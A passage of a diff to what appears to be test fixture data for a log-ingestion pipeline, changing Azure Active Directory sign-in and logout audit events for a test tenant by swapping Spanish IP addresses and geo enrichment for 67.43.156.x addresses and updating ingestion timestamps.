Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970218500Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3998,25 +3482,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4030,7 +3496,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "Login:login" @@ -4079,7 +3545,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -4091,12 +3557,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051583Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970224100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4135,25 +3601,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" 
@@ -4167,7 +3615,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -4218,7 +3666,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -4230,12 +3678,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051586400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970229600Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -4274,25 +3722,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4306,7 +3736,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4344,7 +3774,7 @@ }, "related": { "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -4356,12 +3786,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051589200Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970235300Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4397,25 +3827,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4429,7 +3841,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -4479,7 +3891,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -4491,12 +3903,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051592100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970241200Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -4535,25 +3947,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4567,7 +3961,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4605,7 +3999,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4617,12 +4011,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051595Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970247Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4658,25 +4052,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4690,7 +4066,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -4741,7 +4117,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4753,12 +4129,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051598Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 